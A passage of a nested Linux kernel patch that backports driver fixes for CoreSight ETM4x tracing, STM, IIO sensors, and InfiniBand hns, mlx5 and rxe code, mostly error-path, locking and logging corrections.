++	if (WARN_ON(!drvdata->csdev))
++		return;
+ 
+ 	etm4_cs_unlock(drvdata, csa);
+ 	etm4x_relaxed_write32(csa, state->trcclaimset, TRCCLAIMSET);
+@@ -1746,16 +1749,14 @@ static void __etm4_cpu_restore(struct etmv4_drvdata *drvdata)
+ 	etm4x_relaxed_write32(csa, state->trcccctlr, TRCCCCTLR);
+ 	etm4x_relaxed_write32(csa, state->trcbbctlr, TRCBBCTLR);
+ 	etm4x_relaxed_write32(csa, state->trctraceidr, TRCTRACEIDR);
+-	etm4x_relaxed_write32(csa, state->trcqctlr, TRCQCTLR);
++	if (drvdata->q_filt)
++		etm4x_relaxed_write32(csa, state->trcqctlr, TRCQCTLR);
+ 
+ 	etm4x_relaxed_write32(csa, state->trcvictlr, TRCVICTLR);
+ 	etm4x_relaxed_write32(csa, state->trcviiectlr, TRCVIIECTLR);
+ 	etm4x_relaxed_write32(csa, state->trcvissctlr, TRCVISSCTLR);
+ 	if (drvdata->nr_pe_cmp)
+ 		etm4x_relaxed_write32(csa, state->trcvipcssctlr, TRCVIPCSSCTLR);
+-	etm4x_relaxed_write32(csa, state->trcvdctlr, TRCVDCTLR);
+-	etm4x_relaxed_write32(csa, state->trcvdsacctlr, TRCVDSACCTLR);
+-	etm4x_relaxed_write32(csa, state->trcvdarcctlr, TRCVDARCCTLR);
+ 
+ 	for (i = 0; i < drvdata->nrseqstate - 1; i++)
+ 		etm4x_relaxed_write32(csa, state->trcseqevr[i], TRCSEQEVRn(i));
+@@ -1772,7 +1773,8 @@ static void __etm4_cpu_restore(struct etmv4_drvdata *drvdata)
+ 		etm4x_relaxed_write32(csa, state->trccntvr[i], TRCCNTVRn(i));
+ 	}
+ 
+-	for (i = 0; i < drvdata->nr_resource * 2; i++)
++	/* Resource selector pair 0 is reserved */
++	for (i = 2; i < drvdata->nr_resource * 2; i++)
+ 		etm4x_relaxed_write32(csa, state->trcrsctlr[i], TRCRSCTLRn(i));
+ 
+ 	for (i = 0; i < drvdata->nr_ss_cmp; i++) {
+@@ -2053,6 +2055,9 @@ static int etm4_probe_platform_dev(struct platform_device *pdev)
+ 	ret = etm4_probe(&pdev->dev, NULL, 0);
+ 
+ 	pm_runtime_put(&pdev->dev);
++	if (ret)
++		pm_runtime_disable(&pdev->dev);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x.h b/drivers/hwtracing/coresight/coresight-etm4x.h
+index d8e4d902b01ad..31754173091b9 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x.h
++++ b/drivers/hwtracing/coresight/coresight-etm4x.h
+@@ -43,9 +43,6 @@
+ #define TRCVIIECTLR			0x084
+ #define TRCVISSCTLR			0x088
+ #define TRCVIPCSSCTLR			0x08C
+-#define TRCVDCTLR			0x0A0
+-#define TRCVDSACCTLR			0x0A4
+-#define TRCVDARCCTLR			0x0A8
+ /* Derived resources registers */
+ #define TRCSEQEVRn(n)			(0x100 + (n * 4)) /* n = 0-2 */
+ #define TRCSEQRSTEVR			0x118
+@@ -90,9 +87,6 @@
+ /* Address Comparator registers n = 0-15 */
+ #define TRCACVRn(n)			(0x400 + (n * 8))
+ #define TRCACATRn(n)			(0x480 + (n * 8))
+-/* Data Value Comparator Value registers, n = 0-7 */
+-#define TRCDVCVRn(n)			(0x500 + (n * 16))
+-#define TRCDVCMRn(n)			(0x580 + (n * 16))
+ /* ContextID/Virtual ContextID comparators, n = 0-7 */
+ #define TRCCIDCVRn(n)			(0x600 + (n * 8))
+ #define TRCVMIDCVRn(n)			(0x640 + (n * 8))
+@@ -141,6 +135,7 @@
+ #define TRCIDR0_TRCCCI				BIT(7)
+ #define TRCIDR0_RETSTACK			BIT(9)
+ #define TRCIDR0_NUMEVENT_MASK			GENMASK(11, 10)
++#define TRCIDR0_QFILT				BIT(14)
+ #define TRCIDR0_QSUPP_MASK			GENMASK(16, 15)
+ #define TRCIDR0_TSSIZE_MASK			GENMASK(28, 24)
+ 
+@@ -272,9 +267,6 @@
+ /* List of registers accessible via System instructions */
+ #define ETM4x_ONLY_SYSREG_LIST(op, val)		\
+ 	CASE_##op((val), TRCPROCSELR)		\
+-	CASE_##op((val), TRCVDCTLR)		\
+-	CASE_##op((val), TRCVDSACCTLR)		\
+-	CASE_##op((val), TRCVDARCCTLR)		\
+ 	CASE_##op((val), TRCOSLAR)
+ 
+ #define ETM_COMMON_SYSREG_LIST(op, val)		\
+@@ -422,22 +414,6 @@
+ 	CASE_##op((val), TRCACATRn(13))		\
+ 	CASE_##op((val), TRCACATRn(14))		\
+ 	CASE_##op((val), TRCACATRn(15))		\
+-	CASE_##op((val), TRCDVCVRn(0))		\
+-	CASE_##op((val), TRCDVCVRn(1))		\
+-	CASE_##op((val), TRCDVCVRn(2))		\
+-	CASE_##op((val), TRCDVCVRn(3))		\
+-	CASE_##op((val), TRCDVCVRn(4))		\
+-	CASE_##op((val), TRCDVCVRn(5))		\
+-	CASE_##op((val), TRCDVCVRn(6))		\
+-	CASE_##op((val), TRCDVCVRn(7))		\
+-	CASE_##op((val), TRCDVCMRn(0))		\
+-	CASE_##op((val), TRCDVCMRn(1))		\
+-	CASE_##op((val), TRCDVCMRn(2))		\
+-	CASE_##op((val), TRCDVCMRn(3))		\
+-	CASE_##op((val), TRCDVCMRn(4))		\
+-	CASE_##op((val), TRCDVCMRn(5))		\
+-	CASE_##op((val), TRCDVCMRn(6))		\
+-	CASE_##op((val), TRCDVCMRn(7))		\
+ 	CASE_##op((val), TRCCIDCVRn(0))		\
+ 	CASE_##op((val), TRCCIDCVRn(1))		\
+ 	CASE_##op((val), TRCCIDCVRn(2))		\
+@@ -905,9 +881,6 @@ struct etmv4_save_state {
+ 	u32	trcviiectlr;
+ 	u32	trcvissctlr;
+ 	u32	trcvipcssctlr;
+-	u32	trcvdctlr;
+-	u32	trcvdsacctlr;
+-	u32	trcvdarcctlr;
+ 
+ 	u32	trcseqevr[ETM_MAX_SEQ_STATES];
+ 	u32	trcseqrstevr;
+@@ -979,6 +952,7 @@ struct etmv4_save_state {
+  * @os_unlock:  True if access to management registers is allowed.
+  * @instrp0:	Tracing of load and store instructions
+  *		as P0 elements is supported.
++ * @q_filt:	Q element filtering support, if Q elements are supported.
+  * @trcbb:	Indicates if the trace unit supports branch broadcast tracing.
+  * @trccond:	If the trace unit supports conditional
+  *		instruction tracing.
+@@ -1041,6 +1015,7 @@ struct etmv4_drvdata {
+ 	bool				boot_enable;
+ 	bool				os_unlock;
+ 	bool				instrp0;
++	bool				q_filt;
+ 	bool				trcbb;
+ 	bool				trccond;
+ 	bool				retstack;
+diff --git a/drivers/hwtracing/stm/core.c b/drivers/hwtracing/stm/core.c
+index 2712e699ba08c..ae9ea3a1fa2aa 100644
+--- a/drivers/hwtracing/stm/core.c
++++ b/drivers/hwtracing/stm/core.c
+@@ -868,8 +868,11 @@ int stm_register_device(struct device *parent, struct stm_data *stm_data,
+ 		return -ENOMEM;
+ 
+ 	stm->major = register_chrdev(0, stm_data->name, &stm_fops);
+-	if (stm->major < 0)
+-		goto err_free;
++	if (stm->major < 0) {
++		err = stm->major;
++		vfree(stm);
++		return err;
++	}
+ 
+ 	device_initialize(&stm->dev);
+ 	stm->dev.devt = MKDEV(stm->major, 0);
+@@ -913,10 +916,8 @@ int stm_register_device(struct device *parent, struct stm_data *stm_data,
+ err_device:
+ 	unregister_chrdev(stm->major, stm_data->name);
+ 
+-	/* matches device_initialize() above */
++	/* calls stm_device_release() */
+ 	put_device(&stm->dev);
+-err_free:
+-	vfree(stm);
+ 
+ 	return err;
+ }
+diff --git a/drivers/iio/adc/stm32-adc.c b/drivers/iio/adc/stm32-adc.c
+index a5d5b7b3823bc..6fede34091cc2 100644
+--- a/drivers/iio/adc/stm32-adc.c
++++ b/drivers/iio/adc/stm32-adc.c
+@@ -2079,6 +2079,7 @@ static int stm32_adc_generic_chan_init(struct iio_dev *indio_dev,
+ 			if (vin[0] != val || vin[1] >= adc_info->max_channels) {
+ 				dev_err(&indio_dev->dev, "Invalid channel in%d-in%d\n",
+ 					vin[0], vin[1]);
++				ret = -EINVAL;
+ 				goto err;
+ 			}
+ 		} else if (ret != -EINVAL) {
+diff --git a/drivers/iio/industrialio-core.c b/drivers/iio/industrialio-core.c
+index a2f8278f00856..135a86fc94531 100644
+--- a/drivers/iio/industrialio-core.c
++++ b/drivers/iio/industrialio-core.c
+@@ -1670,8 +1670,10 @@ struct iio_dev *iio_device_alloc(struct device *parent, int sizeof_priv)
+ 		return NULL;
+ 
+ 	indio_dev = &iio_dev_opaque->indio_dev;
+-	indio_dev->priv = (char *)iio_dev_opaque +
+-		ALIGN(sizeof(struct iio_dev_opaque), IIO_DMA_MINALIGN);
++
++	if (sizeof_priv)
++		indio_dev->priv = (char *)iio_dev_opaque +
++			ALIGN(sizeof(*iio_dev_opaque), IIO_DMA_MINALIGN);
+ 
+ 	indio_dev->dev.parent = parent;
+ 	indio_dev->dev.type = &iio_device_type;
+diff --git a/drivers/iio/pressure/dps310.c b/drivers/iio/pressure/dps310.c
+index db1b1e48225aa..519fcd425b6a3 100644
+--- a/drivers/iio/pressure/dps310.c
++++ b/drivers/iio/pressure/dps310.c
+@@ -730,7 +730,7 @@ static int dps310_read_pressure(struct dps310_data *data, int *val, int *val2,
+ 	}
+ }
+ 
+-static int dps310_calculate_temp(struct dps310_data *data)
++static int dps310_calculate_temp(struct dps310_data *data, int *val)
+ {
+ 	s64 c0;
+ 	s64 t;
+@@ -746,7 +746,9 @@ static int dps310_calculate_temp(struct dps310_data *data)
+ 	t = c0 + ((s64)data->temp_raw * (s64)data->c1);
+ 
+ 	/* Convert to milliCelsius and scale the temperature */
+-	return (int)div_s64(t * 1000LL, kt);
++	*val = (int)div_s64(t * 1000LL, kt);
++
++	return 0;
+ }
+ 
+ static int dps310_read_temp(struct dps310_data *data, int *val, int *val2,
+@@ -768,11 +770,10 @@ static int dps310_read_temp(struct dps310_data *data, int *val, int *val2,
+ 		if (rc)
+ 			return rc;
+ 
+-		rc = dps310_calculate_temp(data);
+-		if (rc < 0)
++		rc = dps310_calculate_temp(data, val);
++		if (rc)
+ 			return rc;
+ 
+-		*val = rc;
+ 		return IIO_VAL_INT;
+ 
+ 	case IIO_CHAN_INFO_OVERSAMPLING_RATIO:
+diff --git a/drivers/infiniband/hw/hns/hns_roce_cq.c b/drivers/infiniband/hw/hns/hns_roce_cq.c
+index 736dc2f993b40..ff177466de9b4 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_cq.c
++++ b/drivers/infiniband/hw/hns/hns_roce_cq.c
+@@ -151,7 +151,7 @@ static int alloc_cqc(struct hns_roce_dev *hr_dev, struct hns_roce_cq *hr_cq)
+ 		return ret;
+ 	}
+ 
+-	ret = xa_err(xa_store(&cq_table->array, hr_cq->cqn, hr_cq, GFP_KERNEL));
++	ret = xa_err(xa_store_irq(&cq_table->array, hr_cq->cqn, hr_cq, GFP_KERNEL));
+ 	if (ret) {
+ 		ibdev_err(ibdev, "failed to xa_store CQ, ret = %d.\n", ret);
+ 		goto err_put;
+@@ -164,7 +164,7 @@ static int alloc_cqc(struct hns_roce_dev *hr_dev, struct hns_roce_cq *hr_cq)
+ 	return 0;
+ 
+ err_xa:
+-	xa_erase(&cq_table->array, hr_cq->cqn);
++	xa_erase_irq(&cq_table->array, hr_cq->cqn);
+ err_put:
+ 	hns_roce_table_put(hr_dev, &cq_table->table, hr_cq->cqn);
+ 
+@@ -183,7 +183,7 @@ static void free_cqc(struct hns_roce_dev *hr_dev, struct hns_roce_cq *hr_cq)
+ 		dev_err(dev, "DESTROY_CQ failed (%d) for CQN %06lx\n", ret,
+ 			hr_cq->cqn);
+ 
+-	xa_erase(&cq_table->array, hr_cq->cqn);
++	xa_erase_irq(&cq_table->array, hr_cq->cqn);
+ 
+ 	/* Waiting interrupt process procedure carried out */
+ 	synchronize_irq(hr_dev->eq_table.eq[hr_cq->vector].irq);
+@@ -472,13 +472,6 @@ void hns_roce_cq_event(struct hns_roce_dev *hr_dev, u32 cqn, int event_type)
+ 	struct ib_event event;
+ 	struct ib_cq *ibcq;
+ 
+-	hr_cq = xa_load(&hr_dev->cq_table.array,
+-			cqn & (hr_dev->caps.num_cqs - 1));
+-	if (!hr_cq) {
+-		dev_warn(dev, "async event for bogus CQ 0x%06x\n", cqn);
+-		return;
+-	}
+-
+ 	if (event_type != HNS_ROCE_EVENT_TYPE_CQ_ID_INVALID &&
+ 	    event_type != HNS_ROCE_EVENT_TYPE_CQ_ACCESS_ERROR &&
+ 	    event_type != HNS_ROCE_EVENT_TYPE_CQ_OVERFLOW) {
+@@ -487,7 +480,16 @@ void hns_roce_cq_event(struct hns_roce_dev *hr_dev, u32 cqn, int event_type)
+ 		return;
+ 	}
+ 
+-	refcount_inc(&hr_cq->refcount);
++	xa_lock(&hr_dev->cq_table.array);
++	hr_cq = xa_load(&hr_dev->cq_table.array,
++			cqn & (hr_dev->caps.num_cqs - 1));
++	if (hr_cq)
++		refcount_inc(&hr_cq->refcount);
++	xa_unlock(&hr_dev->cq_table.array);
++	if (!hr_cq) {
++		dev_warn(dev, "async event for bogus CQ 0x%06x\n", cqn);
++		return;
++	}
+ 
+ 	ibcq = &hr_cq->ib_cq;
+ 	if (ibcq->event_handler) {
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hem.h b/drivers/infiniband/hw/hns/hns_roce_hem.h
+index 7d23d3c51da46..fea6d7d508b60 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hem.h
++++ b/drivers/infiniband/hw/hns/hns_roce_hem.h
+@@ -61,16 +61,16 @@ enum {
+ 	 (sizeof(struct scatterlist) + sizeof(void *)))
+ 
+ #define check_whether_bt_num_3(type, hop_num) \
+-	(type < HEM_TYPE_MTT && hop_num == 2)
++	((type) < HEM_TYPE_MTT && (hop_num) == 2)
+ 
+ #define check_whether_bt_num_2(type, hop_num) \
+-	((type < HEM_TYPE_MTT && hop_num == 1) || \
+-	(type >= HEM_TYPE_MTT && hop_num == 2))
++	(((type) < HEM_TYPE_MTT && (hop_num) == 1) || \
++	((type) >= HEM_TYPE_MTT && (hop_num) == 2))
+ 
+ #define check_whether_bt_num_1(type, hop_num) \
+-	((type < HEM_TYPE_MTT && hop_num == HNS_ROCE_HOP_NUM_0) || \
+-	(type >= HEM_TYPE_MTT && hop_num == 1) || \
+-	(type >= HEM_TYPE_MTT && hop_num == HNS_ROCE_HOP_NUM_0))
++	(((type) < HEM_TYPE_MTT && (hop_num) == HNS_ROCE_HOP_NUM_0) || \
++	((type) >= HEM_TYPE_MTT && (hop_num) == 1) || \
++	((type) >= HEM_TYPE_MTT && (hop_num) == HNS_ROCE_HOP_NUM_0))
+ 
+ struct hns_roce_hem_chunk {
+ 	struct list_head	 list;
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index d06b19e69a151..c931cce50d50d 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -2229,7 +2229,7 @@ static void apply_func_caps(struct hns_roce_dev *hr_dev)
+ 		caps->gid_table_len[0] = caps->gmv_bt_num *
+ 					(HNS_HW_PAGE_SIZE / caps->gmv_entry_sz);
+ 
+-		caps->gmv_entry_num = caps->gmv_bt_num * (PAGE_SIZE /
++		caps->gmv_entry_num = caps->gmv_bt_num * (HNS_HW_PAGE_SIZE /
+ 							  caps->gmv_entry_sz);
+ 	} else {
+ 		u32 func_num = max_t(u32, 1, hr_dev->func_num);
+@@ -3857,8 +3857,9 @@ static void get_cqe_status(struct hns_roce_dev *hr_dev, struct hns_roce_qp *qp,
+ 		   wc->status == IB_WC_WR_FLUSH_ERR))
+ 		return;
+ 
+-	ibdev_err(&hr_dev->ib_dev, "error cqe status 0x%x:\n", cqe_status);
+-	print_hex_dump(KERN_ERR, "", DUMP_PREFIX_NONE, 16, 4, cqe,
++	ibdev_err_ratelimited(&hr_dev->ib_dev, "error cqe status 0x%x:\n",
++			      cqe_status);
++	print_hex_dump(KERN_DEBUG, "", DUMP_PREFIX_NONE, 16, 4, cqe,
+ 		       cq->cqe_size, false);
+ 	wc->vendor_err = hr_reg_read(cqe, CQE_SUB_STATUS);
+ 
+diff --git a/drivers/infiniband/hw/hns/hns_roce_main.c b/drivers/infiniband/hw/hns/hns_roce_main.c
+index da1b33d818d82..afe7523eca909 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_main.c
++++ b/drivers/infiniband/hw/hns/hns_roce_main.c
+@@ -37,6 +37,7 @@
+ #include <rdma/ib_smi.h>
+ #include <rdma/ib_user_verbs.h>
+ #include <rdma/ib_cache.h>
++#include "hnae3.h"
+ #include "hns_roce_common.h"
+ #include "hns_roce_device.h"
+ #include "hns_roce_hem.h"
+diff --git a/drivers/infiniband/hw/hns/hns_roce_mr.c b/drivers/infiniband/hw/hns/hns_roce_mr.c
+index 14376490ac226..190e62da98e4b 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_mr.c
++++ b/drivers/infiniband/hw/hns/hns_roce_mr.c
+@@ -421,18 +421,18 @@ int hns_roce_map_mr_sg(struct ib_mr *ibmr, struct scatterlist *sg, int sg_nents,
+ 	struct ib_device *ibdev = &hr_dev->ib_dev;
+ 	struct hns_roce_mr *mr = to_hr_mr(ibmr);
+ 	struct hns_roce_mtr *mtr = &mr->pbl_mtr;
+-	int ret = 0;
++	int ret, sg_num = 0;
+ 
+ 	mr->npages = 0;
+ 	mr->page_list = kvcalloc(mr->pbl_mtr.hem_cfg.buf_pg_count,
+ 				 sizeof(dma_addr_t), GFP_KERNEL);
+ 	if (!mr->page_list)
+-		return ret;
++		return sg_num;
+ 
+-	ret = ib_sg_to_pages(ibmr, sg, sg_nents, sg_offset, hns_roce_set_page);
+-	if (ret < 1) {
++	sg_num = ib_sg_to_pages(ibmr, sg, sg_nents, sg_offset, hns_roce_set_page);
++	if (sg_num < 1) {
+ 		ibdev_err(ibdev, "failed to store sg pages %u %u, cnt = %d.\n",
+-			  mr->npages, mr->pbl_mtr.hem_cfg.buf_pg_count, ret);
++			  mr->npages, mr->pbl_mtr.hem_cfg.buf_pg_count, sg_num);
+ 		goto err_page_list;
+ 	}
+ 
+@@ -443,17 +443,16 @@ int hns_roce_map_mr_sg(struct ib_mr *ibmr, struct scatterlist *sg, int sg_nents,
+ 	ret = hns_roce_mtr_map(hr_dev, mtr, mr->page_list, mr->npages);
+ 	if (ret) {
+ 		ibdev_err(ibdev, "failed to map sg mtr, ret = %d.\n", ret);
+-		ret = 0;
++		sg_num = 0;
+ 	} else {
+ 		mr->pbl_mtr.hem_cfg.buf_pg_shift = (u32)ilog2(ibmr->page_size);
+-		ret = mr->npages;
+ 	}
+ 
+ err_page_list:
+ 	kvfree(mr->page_list);
+ 	mr->page_list = NULL;
+ 
+-	return ret;
++	return sg_num;
+ }
+ 
+ static void hns_roce_mw_free(struct hns_roce_dev *hr_dev,
+diff --git a/drivers/infiniband/hw/hns/hns_roce_srq.c b/drivers/infiniband/hw/hns/hns_roce_srq.c
+index 8dae98f827eb2..6a4923c21cbc6 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_srq.c
++++ b/drivers/infiniband/hw/hns/hns_roce_srq.c
+@@ -122,7 +122,7 @@ static int alloc_srqc(struct hns_roce_dev *hr_dev, struct hns_roce_srq *srq)
+ 		return ret;
+ 	}
+ 
+-	ret = xa_err(xa_store(&srq_table->xa, srq->srqn, srq, GFP_KERNEL));
++	ret = xa_err(xa_store_irq(&srq_table->xa, srq->srqn, srq, GFP_KERNEL));
+ 	if (ret) {
+ 		ibdev_err(ibdev, "failed to store SRQC, ret = %d.\n", ret);
+ 		goto err_put;
+@@ -135,7 +135,7 @@ static int alloc_srqc(struct hns_roce_dev *hr_dev, struct hns_roce_srq *srq)
+ 	return 0;
+ 
+ err_xa:
+-	xa_erase(&srq_table->xa, srq->srqn);
++	xa_erase_irq(&srq_table->xa, srq->srqn);
+ err_put:
+ 	hns_roce_table_put(hr_dev, &srq_table->table, srq->srqn);
+ 
+@@ -153,7 +153,7 @@ static void free_srqc(struct hns_roce_dev *hr_dev, struct hns_roce_srq *srq)
+ 		dev_err(hr_dev->dev, "DESTROY_SRQ failed (%d) for SRQN %06lx\n",
+ 			ret, srq->srqn);
+ 
+-	xa_erase(&srq_table->xa, srq->srqn);
++	xa_erase_irq(&srq_table->xa, srq->srqn);
+ 
+ 	if (refcount_dec_and_test(&srq->refcount))
+ 		complete(&srq->free);
+diff --git a/drivers/infiniband/hw/mlx5/mem.c b/drivers/infiniband/hw/mlx5/mem.c
+index 96ffbbaf0a73d..5a22be14d958f 100644
+--- a/drivers/infiniband/hw/mlx5/mem.c
++++ b/drivers/infiniband/hw/mlx5/mem.c
+@@ -30,6 +30,7 @@
+  * SOFTWARE.
+  */
+ 
++#include <linux/io.h>
+ #include <rdma/ib_umem_odp.h>
+ #include "mlx5_ib.h"
+ #include <linux/jiffies.h>
+@@ -108,7 +109,6 @@ static int post_send_nop(struct mlx5_ib_dev *dev, struct ib_qp *ibqp, u64 wr_id,
+ 	__be32 mmio_wqe[16] = {};
+ 	unsigned long flags;
+ 	unsigned int idx;
+-	int i;
+ 
+ 	if (unlikely(dev->mdev->state == MLX5_DEVICE_STATE_INTERNAL_ERROR))
+ 		return -EIO;
+@@ -148,10 +148,8 @@ static int post_send_nop(struct mlx5_ib_dev *dev, struct ib_qp *ibqp, u64 wr_id,
+ 	 * we hit doorbell
+ 	 */
+ 	wmb();
+-	for (i = 0; i < 8; i++)
+-		mlx5_write64(&mmio_wqe[i * 2],
+-			     bf->bfreg->map + bf->offset + i * 8);
+-	io_stop_wc();
++	__iowrite64_copy(bf->bfreg->map + bf->offset, mmio_wqe,
++			 sizeof(mmio_wqe) / 8);
+ 
+ 	bf->offset ^= bf->buf_size;
+ 
+diff --git a/drivers/infiniband/hw/mlx5/mr.c b/drivers/infiniband/hw/mlx5/mr.c
+index 410cc5fd25239..b81b03aa2a629 100644
+--- a/drivers/infiniband/hw/mlx5/mr.c
++++ b/drivers/infiniband/hw/mlx5/mr.c
+@@ -1349,7 +1349,8 @@ static bool can_use_umr_rereg_access(struct mlx5_ib_dev *dev,
+ 	unsigned int diffs = current_access_flags ^ target_access_flags;
+ 
+ 	if (diffs & ~(IB_ACCESS_LOCAL_WRITE | IB_ACCESS_REMOTE_WRITE |
+-		      IB_ACCESS_REMOTE_READ | IB_ACCESS_RELAXED_ORDERING))
++		      IB_ACCESS_REMOTE_READ | IB_ACCESS_RELAXED_ORDERING |
++		      IB_ACCESS_REMOTE_ATOMIC))
+ 		return false;
+ 	return mlx5r_umr_can_reconfig(dev, current_access_flags,
+ 				      target_access_flags);
+diff --git a/drivers/infiniband/sw/rxe/rxe_comp.c b/drivers/infiniband/sw/rxe/rxe_comp.c
+index d2a2501236174..c238fa61815aa 100644
+--- a/drivers/infiniband/sw/rxe/rxe_comp.c
++++ b/drivers/infiniband/sw/rxe/rxe_comp.c
+@@ -126,12 +126,12 @@ void rxe_comp_queue_pkt(struct rxe_qp *qp, struct sk_buff *skb)
+ {
+ 	int must_sched;
+ 
+-	skb_queue_tail(&qp->resp_pkts, skb);
+-
+-	must_sched = skb_queue_len(&qp->resp_pkts) > 1;
++	must_sched = skb_queue_len(&qp->resp_pkts) > 0;
+ 	if (must_sched != 0)
+ 		rxe_counter_inc(SKB_TO_PKT(skb)->rxe, RXE_CNT_COMPLETER_SCHED);
+ 
++	skb_queue_tail(&qp->resp_pkts, skb);
++
+ 	if (must_sched)
+ 		rxe_sched_task(&qp->comp.task);
+ 	else
+diff --git a/drivers/infiniband/sw/rxe/rxe_net.c b/drivers/infiniband/sw/rxe/rxe_net.c
+index 719432808a063..779cd547ce839 100644
+--- a/drivers/infiniband/sw/rxe/rxe_net.c
++++ b/drivers/infiniband/sw/rxe/rxe_net.c
+@@ -20,9 +20,10 @@
+ 
+ static struct rxe_recv_sockets recv_sockets;
+ 
+-static struct dst_entry *rxe_find_route4(struct net_device *ndev,
+-				  struct in_addr *saddr,
+-				  struct in_addr *daddr)
++static struct dst_entry *rxe_find_route4(struct rxe_qp *qp,
++					 struct net_device *ndev,
++					 struct in_addr *saddr,
++					 struct in_addr *daddr)
+ {
+ 	struct rtable *rt;
+ 	struct flowi4 fl = { { 0 } };
+@@ -35,7 +36,7 @@ static struct dst_entry *rxe_find_route4(struct net_device *ndev,
+ 
+ 	rt = ip_route_output_key(&init_net, &fl);
+ 	if (IS_ERR(rt)) {
+-		pr_err_ratelimited("no route to %pI4\n", &daddr->s_addr);
++		rxe_dbg_qp(qp, "no route to %pI4\n", &daddr->s_addr);
+ 		return NULL;
+ 	}
+ 
+@@ -43,7 +44,8 @@ static struct dst_entry *rxe_find_route4(struct net_device *ndev,
+ }
+ 
+ #if IS_ENABLED(CONFIG_IPV6)
+-static struct dst_entry *rxe_find_route6(struct net_device *ndev,
++static struct dst_entry *rxe_find_route6(struct rxe_qp *qp,
++					 struct net_device *ndev,
+ 					 struct in6_addr *saddr,
+ 					 struct in6_addr *daddr)
+ {
+@@ -60,12 +62,12 @@ static struct dst_entry *rxe_find_route6(struct net_device *ndev,
+ 					       recv_sockets.sk6->sk, &fl6,
+ 					       NULL);
+ 	if (IS_ERR(ndst)) {
+-		pr_err_ratelimited("no route to %pI6\n", daddr);
++		rxe_dbg_qp(qp, "no route to %pI6\n", daddr);
+ 		return NULL;
+ 	}
+ 
+ 	if (unlikely(ndst->error)) {
+-		pr_err("no route to %pI6\n", daddr);
++		rxe_dbg_qp(qp, "no route to %pI6\n", daddr);
+ 		goto put;
+ 	}
+ 
+@@ -77,7 +79,8 @@ static struct dst_entry *rxe_find_route6(struct net_device *ndev,
+ 
+ #else
+ 
+-static struct dst_entry *rxe_find_route6(struct net_device *ndev,
++static struct dst_entry *rxe_find_route6(struct rxe_qp *qp,
++					 struct net_device *ndev,
+ 					 struct in6_addr *saddr,
+ 					 struct in6_addr *daddr)
+ {
+@@ -105,14 +108,14 @@ static struct dst_entry *rxe_find_route(struct net_device *ndev,
+ 
+ 			saddr = &av->sgid_addr._sockaddr_in.sin_addr;
+ 			daddr = &av->dgid_addr._sockaddr_in.sin_addr;
+-			dst = rxe_find_route4(ndev, saddr, daddr);
++			dst = rxe_find_route4(qp, ndev, saddr, daddr);
+ 		} else if (av->network_type == RXE_NETWORK_TYPE_IPV6) {
+ 			struct in6_addr *saddr6;
+ 			struct in6_addr *daddr6;
+ 
+ 			saddr6 = &av->sgid_addr._sockaddr_in6.sin6_addr;
+ 			daddr6 = &av->dgid_addr._sockaddr_in6.sin6_addr;
+-			dst = rxe_find_route6(ndev, saddr6, daddr6);
++			dst = rxe_find_route6(qp, ndev, saddr6, daddr6);
+ #if IS_ENABLED(CONFIG_IPV6)
+ 			if (dst)
+ 				qp->dst_cookie =
+@@ -285,7 +288,7 @@ static int prepare4(struct rxe_av *av, struct rxe_pkt_info *pkt,
+ 
+ 	dst = rxe_find_route(skb->dev, qp, av);
+ 	if (!dst) {
+-		pr_err("Host not reachable\n");
++		rxe_dbg_qp(qp, "Host not reachable\n");
+ 		return -EHOSTUNREACH;
+ 	}
+ 
+@@ -309,7 +312,7 @@ static int prepare6(struct rxe_av *av, struct rxe_pkt_info *pkt,
+ 
+ 	dst = rxe_find_route(skb->dev, qp, av);
+ 	if (!dst) {
+-		pr_err("Host not reachable\n");
++		rxe_dbg_qp(qp, "Host not reachable\n");
+ 		return -EHOSTUNREACH;
+ 	}
+ 
+@@ -363,20 +366,13 @@ static int rxe_send(struct sk_buff *skb, struct rxe_pkt_info *pkt)
+ 	rxe_get(pkt->qp);
+ 	atomic_inc(&pkt->qp->skb_out);
+ 
+-	if (skb->protocol == htons(ETH_P_IP)) {
++	if (skb->protocol == htons(ETH_P_IP))
+ 		err = ip_local_out(dev_net(skb_dst(skb)->dev), skb->sk, skb);
+-	} else if (skb->protocol == htons(ETH_P_IPV6)) {
++	else
+ 		err = ip6_local_out(dev_net(skb_dst(skb)->dev), skb->sk, skb);
+-	} else {
+-		pr_err("Unknown layer 3 protocol: %d\n", skb->protocol);
+-		atomic_dec(&pkt->qp->skb_out);
+-		rxe_put(pkt->qp);
+-		kfree_skb(skb);
+-		return -EINVAL;
+-	}
+ 
+ 	if (unlikely(net_xmit_eval(err))) {
+-		pr_debug("error sending packet: %d\n", err);
++		rxe_dbg_qp(pkt->qp, "error sending packet: %d\n", err);
+ 		return -EAGAIN;
+ 	}
+ 
+@@ -417,7 +413,7 @@ int rxe_xmit_packet(struct rxe_qp *qp, struct rxe_pkt_info *pkt,
+ 
+ 	if ((is_request && (qp->req.state != QP_STATE_READY)) ||
+ 	    (!is_request && (qp->resp.state != QP_STATE_READY))) {
+-		pr_info("Packet dropped. QP is not in ready state\n");
++		rxe_dbg_qp(qp, "Packet dropped. QP is not in ready state\n");
+ 		goto drop;
+ 	}
+ 
+@@ -598,7 +594,7 @@ static int rxe_notify(struct notifier_block *not_blk,
+ 		rxe_port_down(rxe);
+ 		break;
+ 	case NETDEV_CHANGEMTU:
+-		pr_info("%s changed mtu to %d\n", ndev->name, ndev->mtu);
++		rxe_dbg(rxe, "%s changed mtu to %d\n", ndev->name, ndev->mtu);
+ 		rxe_set_mtu(rxe, ndev->mtu);
+ 		break;
+ 	case NETDEV_CHANGE:
+@@ -610,7 +606,7 @@ static int rxe_notify(struct notifier_block *not_blk,
+ 	case NETDEV_CHANGENAME:
+ 	case NETDEV_FEAT_CHANGE:
+ 	default:
+-		pr_info("ignoring netdev event = %ld for %s\n",
++		rxe_dbg(rxe, "ignoring netdev event = %ld for %s\n",
